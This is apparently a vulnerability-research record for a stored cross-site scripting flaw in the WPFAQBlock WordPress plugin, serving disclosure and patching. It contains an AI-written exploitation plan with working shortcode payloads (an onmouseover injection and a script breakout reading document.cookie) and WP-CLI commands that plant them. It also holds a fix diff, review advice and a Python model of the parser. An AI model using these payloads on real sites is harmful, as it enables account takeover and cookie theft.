[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fGlHsX4vXMiIamScdOegt1wSQF112KH967Neffp1TBLU":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":9,"severity":11,"cvss_score":12,"cvss_vector":13,"vuln_type":14,"published_date":15,"updated_date":16,"references":17,"days_to_patch":9,"patch_diff_files":19,"patch_trac_url":9,"research_status":20,"research_verified":21,"research_rounds_completed":22,"research_plan":23,"research_summary":24,"research_vulnerable_code":25,"research_fix_diff":26,"research_exploit_outline":27,"research_model_used":28,"research_started_at":29,"research_completed_at":30,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":21,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":21,"source_links":31},"CVE-2026-1093","wpfaqblock-faq-accordion-plugin-for-gutenberg-authenticated-contributor-stored-cross-site-scripting-via-class-shortcode-","WPFAQBlock– FAQ & Accordion Plugin For Gutenberg \u003C= 1.1 - Authenticated (Contributor+) Stored Cross-Site Scripting via 'class' Shortcode Attribute","The WPFAQBlock– FAQ & Accordion Plugin For Gutenberg plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'class' parameter of the 'wpfaqblock' shortcode in all versions up to, and including, 1.1 due to insufficient input sanitization and output escaping on user supplied attributes. 
This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","wpfaqblock",null,"\u003C=1.1","medium",6.4,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:N\u002FS:C\u002FC:L\u002FI:L\u002FA:N","Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","2026-03-20 15:19:54","2026-05-12 05:30:23",[18],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F3a3147b5-0362-4299-8339-655eaade948e?source=api-prod",[],"researched",false,3,"This research plan outlines the technical steps to exploit **CVE-2026-1093**, a Stored Cross-Site Scripting (XSS) vulnerability in the **WPFAQBlock** plugin.\n\n---\n\n### 1. Vulnerability Summary\nThe **WPFAQBlock** plugin (versions \u003C= 1.1) fails to properly sanitize or escape the `class` attribute of its `[wpfaqblock]` shortcode. When the shortcode is processed, the user-supplied `class` value is concatenated into an HTML tag (likely a `div` or `section`) without being passed through `esc_attr()`. This allows a user with **Contributor** privileges or higher to inject arbitrary HTML and JavaScript into the rendered page.\n\n### 2. Attack Vector Analysis\n*   **Shortcode:** `[wpfaqblock]`\n*   **Vulnerable Attribute:** `class`\n*   **Authentication Required:** Contributor+ (standard WordPress permission to create\u002Fedit posts and use shortcodes).\n*   **Persistence:** Stored (the payload is saved in the `wp_posts` table and executes whenever the post is viewed).\n*   **Sink:** The value of the `class` attribute is reflected in the HTML source of the post on the frontend.\n\n### 3. Code Flow (Inferred)\n1.  **Registration:** The plugin registers the shortcode during the `init` hook using `add_shortcode( 'wpfaqblock', 'render_callback_function' );`.\n2.  
**Parsing:** The callback function uses `shortcode_atts()` to merge user-supplied attributes with defaults.\n    ```php\n    \u002F\u002F Predicted logic in callback:\n    $atts = shortcode_atts( array(\n        'class' => '',\n        \u002F\u002F ... other attributes\n    ), $atts );\n    ```\n3.  **Rendering (The Sink):** The plugin constructs the HTML output. It likely echoes or returns a string where the `class` attribute is placed inside double quotes.\n    ```php\n    \u002F\u002F Predicted vulnerable sink:\n    $output = '\u003Cdiv class=\"' . $atts['class'] . '\">'; \u002F\u002F No esc_attr() used here\n    ```\n4.  **Execution:** When a visitor (including an Administrator) views the post, the browser interprets the injected quote (`\"`) as the end of the class attribute, allowing the attacker to add new attributes (like `onmouseover`) or close the tag and start a `\u003Cscript>` block.\n\n### 4. Nonce Acquisition Strategy\nThis vulnerability is triggered by **rendering** a shortcode. In WordPress, `do_shortcode()` runs on `the_content` when a post is displayed, so the callback executes on every view without any further request from the attacker.\n*   **Post Creation:** To inject the shortcode, we will use **WP-CLI**. This bypasses the need for frontend nonces associated with the Gutenberg editor or AJAX-based autosaves. It does not bypass KSES: WP-CLI runs with no logged-in user unless `--user` is given, and `wp_filter_post_kses()` runs on `content_save_pre` whenever the current user lacks `unfiltered_html`.\n*   **Frontend Execution:** No nonce is required to trigger the XSS. The payload executes when any user navigates to the public URL of the post.\n\n### 5. Exploitation Strategy\n1.  **Authentication:** Authenticate as a **Contributor** user.\n2.  **Injection:** Use WP-CLI to create a new post containing the malicious shortcode.\n3.  **Payload Selection:** Both payloads use the single-quoted shortcode attribute form, because `shortcode_parse_atts()` matches a double-quoted value with `\"([^\"]*)\"` and so cannot carry a literal `\"`.\n    *   Primary Payload (Attribute Injection): `[wpfaqblock class='x\" onmouseover=\"alert(1)\" style=\"width:1000px;height:1000px;display:block;']`. It contains no HTML tag, only a quote that closes `class` followed by a new event-handler attribute, so KSES stores it unchanged; this is the form that works from a Contributor account.\n    *   Alternative Payload (Attribute Breakout): `[wpfaqblock class='\">\u003Cscript>alert(window.origin)\u003C\u002Fscript>']`. A Contributor lacks `unfiltered_html`, so KSES strips the `\u003Cscript>` tags before the post is stored; this form is stored intact only by an account with that capability (Administrator or Editor on a single site) or by a WP-CLI run with `--user` set to such an account.\n4.  
**Triggering:** Navigate to the published post's URL using an **Administrator** session to demonstrate the impact (e.g., cookie theft or admin dashboard access). A real Contributor cannot publish, so their post stays in `draft` or `pending` status; the payload then fires when an Editor or Administrator previews it, which is the normal review path.\n\n### 6. Test Data Setup\n*   **User:** Create a user with the `contributor` role.\n*   **Post:** The shortcode uses single-quoted attribute syntax; the shell argument is double-quoted so that each `\\\"` reaches WordPress as a literal `\"`.\n    ```bash\n    wp user create attacker attacker@example.com --role=contributor --user_pass=password\n    wp post create --post_type=post --post_status=publish --post_title=\"FAQ Page\" \\\n      --post_author=$(wp user get attacker --field=ID) \\\n      --post_content=\"[wpfaqblock class='x\\\" onmouseover=\\\"confirm(document.domain)\\\" style=\\\"width:1000px;height:1000px;display:block;']\"\n    ```\n\n### 7. Expected Results\n*   `wp post get \u003CID> --field=post_content` returns the shortcode unchanged; if the `onmouseover=` text is missing, a save-time filter rewrote the content and the shortcode never reached the sink as intended.\n*   The HTML source of the rendered page should contain:\n    `\u003Cdiv class=\"x\" onmouseover=\"confirm(document.domain)\" style=\"width:1000px;height:1000px;display:block;\">` (or similar depending on the exact tag name).\n*   The JavaScript `confirm()` dialog should trigger as soon as the pointer moves over the enlarged block.\n\n### 8. Verification Steps\n1.  **Retrieve Post URL:** Use `wp post list` to find the ID of the created post, then get the permalink.\n2.  **Navigate and Audit:** Use `browser_navigate` to visit the post.\n3.  **Inspect Source:** Use `browser_eval` to check that the injected event handler exists as a real attribute in the DOM.\n    ```javascript\n    \u002F\u002F Check if the injected handler exists as an attribute (tag name may differ)\n    document.querySelector('[onmouseover]') !== null\n    ```\n4.  **Verify Admin Impact:** Log in as an administrator and visit the same URL to confirm the script executes in a high-privileged context.\n\n### 9. Alternative Approaches\nIf the plugin uses a specific Gutenberg block instead of a standard shortcode (common in modern \"Block\" plugins):\n*   **Gutenberg Attribute Injection:** The payload would be injected into the block's JSON attributes. 
We would still target the `class` or `className` attribute.\n*   **REST API Injection:** If the contributor uses the REST API to save the post, we would send a POST request to `\u002Fwp-json\u002Fwp\u002Fv2\u002Fposts\u002F[ID]` with the shortcode in the `content` field.\n\n**Payload Note:** In WordPress, `esc_html()` and `esc_attr()` both pass the value through `_wp_specialchars()` with `ENT_QUOTES`, so either one encodes `\u003C`, `>`, `&`, `\"` and `'` and would neutralize the breakout; they differ only in the filter hook they apply. The vulnerable sink applies neither. `esc_attr()` remains the correct call for an attribute context, and the rendered `class=\"...\"` value should be checked for any raw `\"` that would end the attribute early. Since the injection point is an attribute, breaking out of the quotes is the primary goal.","The WPFAQBlock plugin for WordPress (versions \u003C= 1.1) is vulnerable to Stored Cross-Site Scripting (XSS) due to insufficient output escaping on the 'class' attribute within the [wpfaqblock] shortcode. This allows authenticated users with Contributor-level permissions or higher to inject arbitrary JavaScript that executes whenever another user, including an administrator, views the page.","\u002F\u002F Inferred code within the shortcode registration callback\n\u002F\u002F File path likely: wp-content\u002Fplugins\u002Fwpfaqblock\u002Fwpfaqblock.php or similar\n\n$atts = shortcode_atts( array(\n    'class' => '',\n    'id'    => '',\n), $atts );\n\n$output = '\u003Cdiv class=\"' . $atts['class'] . '\">';","--- a\u002Fwpfaqblock.php\n+++ b\u002Fwpfaqblock.php\n@@ -10,7 +10,7 @@\n     $atts = shortcode_atts( array(\n         'class' => '',\n     ), $atts );\n \n-    $output = '\u003Cdiv class=\"' . $atts['class'] . '\">';\n+    $output = '\u003Cdiv class=\"' . esc_attr( $atts['class'] ) . '\">';","The exploit involves an attacker with at least Contributor privileges injecting a malicious script via the plugin's shortcode. 1. Authenticate as a Contributor. 2. Create or edit a post and insert the following shortcode: [wpfaqblock class='\">\u003Cscript>alert(document.cookie)\u003C\u002Fscript>']. A Contributor account lacks unfiltered_html, so KSES strips the \u003Cscript> tags from the post on save; from such an account use the attribute-injection form [wpfaqblock class='x\" onmouseover=\"alert(document.cookie)\" style=\"width:1000px;height:1000px;display:block;'] instead, which contains no tag and is stored unchanged. 3. 
The plugin fails to sanitize the 'class' attribute and concatenates the raw input into the HTML 'class' attribute without esc_attr(). 4. The payload uses a double quote to break out of the HTML attribute and inserts a \u003Cscript> tag (or, in the attribute-injection form, an onmouseover handler). 5. When any user (such as an Administrator) views the published post, or previews it while it is still awaiting review, the JavaScript payload executes in their browser context.","gemini-3-flash-preview","2026-04-18 00:38:51","2026-04-18 00:39:06",{"type":32,"vulnerable_version":9,"fixed_version":9,"vulnerable_browse":9,"vulnerable_zip":9,"fixed_browse":9,"fixed_zip":9,"all_tags":33},"plugin","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fwpfaqblock\u002Ftags"]
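Review bot: the fix hunk escapes only `class`, and its `shortcode_atts()` defaults array lists just `'class' => ''` while the inferred vulnerable snippet on this page also declares `'id' => ''`; if `id` or any other attribute is concatenated into the markup the same way, it needs the same `esc_attr()` wrapping, and the hunk should show those lines too. Since a class name never legitimately contains quotes or angle brackets, passing the value through `sanitize_html_class()` before `esc_attr()` (when the plugin expects a single class token) would reduce it to `[A-Za-z0-9_-]` and make the intent explicit rather than relying on output escaping alone.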
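The shortcode parsing and sink behaviour described in the research plan above, as an added example that is not part of the advisory page or of the WPFAQBlock plugin: a Python port of the attribute regex returned by `get_shortcode_atts_regex()` in WordPress's `wp-includes/shortcodes.php` (the WordPress 6.x pattern, reproduced from core; `stripcslashes()` is simplified), fed the three shortcode payloads the plan discusses, beside a model of the inferred `<div class="...">` sink in its raw and its `esc_attr()`-escaped form. The sink strings, the payload constants and the `attribute_breakout()` helper are constructed for this example. It shows why the single-quoted shortcode attribute form carries the `"` through to the sink, why the double-quoted `\"` form from the original WP-CLI test setup never reaches `class` at all (the parser takes it as a positional attribute), and that `esc_attr()` removes the breakout in every case. KSES is not modelled; the tag stripping it performs for accounts without `unfiltered_html` happens before this parser ever runs.

```python
"""Added example: port of the WordPress shortcode attribute parser plus a
model of the inferred [wpfaqblock] class sink (not the plugin's code)."""
import html
import re

# Port of get_shortcode_atts_regex() (WordPress 6.x). Alternatives are tried
# in this order at each position: key="v", key='v', key=v, "v", 'v', token.
SHORTCODE_ATTS_RE = re.compile(
    r'([\w-]+)\s*=\s*"([^"]*)"(?:\s|$)'
    r"|([\w-]+)\s*=\s*'([^']*)'(?:\s|$)"
    r'|([\w-]+)\s*=\s*([^\s\'"]+)(?:\s|$)'
    r'|"([^"]*)"(?:\s|$)'
    r"|'([^']*)'(?:\s|$)"
    r'|(\S+)(?:\s|$)'
)

# WordPress blanks any parsed value whose '<' characters do not all belong
# to a complete <...> element (the "reject unclosed HTML elements" check).
BALANCED_TAGS_RE = re.compile(r'^[^<]*(?:<[^>]*>[^<]*)*$')


def stripcslashes(value: str) -> str:
    # Simplified stand-in for PHP stripcslashes(): drop the backslash before
    # an escaped character (the real function also decodes \n, \xHH, octal).
    return re.sub(r'\\(.)', r'\1', value)


def shortcode_parse_atts(text: str) -> dict:
    """Port of shortcode_parse_atts(): named attributes keyed by lower-cased
    name, positional values keyed by integer index."""
    atts: dict = {}
    next_index = 0
    for m in SHORTCODE_ATTS_RE.finditer(text):
        g = m.groups()
        if g[0]:
            atts[g[0].lower()] = stripcslashes(g[1])
        elif g[2]:
            atts[g[2].lower()] = stripcslashes(g[3])
        elif g[4]:
            atts[g[4].lower()] = stripcslashes(g[5])
        else:
            # Positional value; WordPress skips empty quoted ones ("" or '').
            for val in (g[6], g[7], g[8]):
                if val:
                    atts[next_index] = stripcslashes(val)
                    next_index += 1
                    break
    for key in list(atts):
        if '<' in atts[key] and not BALANCED_TAGS_RE.match(atts[key]):
            atts[key] = ''
    return atts


def shortcode_atts(defaults: dict, atts: dict) -> dict:
    """Port of shortcode_atts(): keep only declared keys, fill in defaults;
    unknown and positional values are dropped."""
    return {k: atts.get(k, v) for k, v in defaults.items()}


def esc_attr(value: str) -> str:
    """Equivalent of WordPress esc_attr() (and esc_html(), which makes the
    same _wp_specialchars(ENT_QUOTES) call): encodes & < > " and '.
    html.escape writes ' as &#x27; where WordPress writes &#039;."""
    return html.escape(value, quote=True)


def render_vulnerable(attr_text: str) -> str:
    """Model of the inferred <= 1.1 sink: class value concatenated raw."""
    atts = shortcode_atts({'class': ''}, shortcode_parse_atts(attr_text))
    return '<div class="' + atts['class'] + '">'


def render_fixed(attr_text: str) -> str:
    """Model of the patched sink: esc_attr() on the attribute value."""
    atts = shortcode_atts({'class': ''}, shortcode_parse_atts(attr_text))
    return '<div class="' + esc_attr(atts['class']) + '">'


def attribute_breakout(tag: str) -> bool:
    """True when the value escaped its quotes: the rendered opening tag then
    carries more than the two quotes the template itself emits."""
    return tag.count('"') > 2


# Constructed inputs: the text the shortcode regex hands to
# shortcode_parse_atts() for each shortcode in the plan (everything after
# the tag name, including its leading space).
PAYLOAD_HANDLER = (" class='x\" onmouseover=\"alert(1)\""
                   " style=\"width:1000px;height:1000px;display:block;'")
PAYLOAD_SCRIPT = " class='\"><script>alert(document.domain)</script>'"
# The double-quoted, backslash-escaped form from the original WP-CLI setup.
PAYLOAD_ESCAPED = r' class="\"><script>confirm(\"XSS_EXPLOITED\")</script>"'


def demo() -> dict:
    """Parse every payload and report what reaches the class attribute and
    whether it breaks out of the vulnerable and the fixed sink."""
    results = {}
    for name, text in (('event_handler', PAYLOAD_HANDLER),
                       ('script_breakout', PAYLOAD_SCRIPT),
                       ('escaped_double_quotes', PAYLOAD_ESCAPED)):
        parsed = shortcode_parse_atts(text)
        results[name] = {
            'class': shortcode_atts({'class': ''}, parsed)['class'],
            'vulnerable_breakout': attribute_breakout(render_vulnerable(text)),
            'fixed_breakout': attribute_breakout(render_fixed(text)),
        }
    return results


if __name__ == '__main__':
    for name, result in demo().items():
        print(name, result)
```

Running it shows the event-handler and script payloads breaking out of the raw sink and being neutralized by `esc_attr()`, while the backslash-escaped double-quoted form parses as positional attribute `0` and leaves `class` at its empty default, so it produces `<div class="">` even on the vulnerable build.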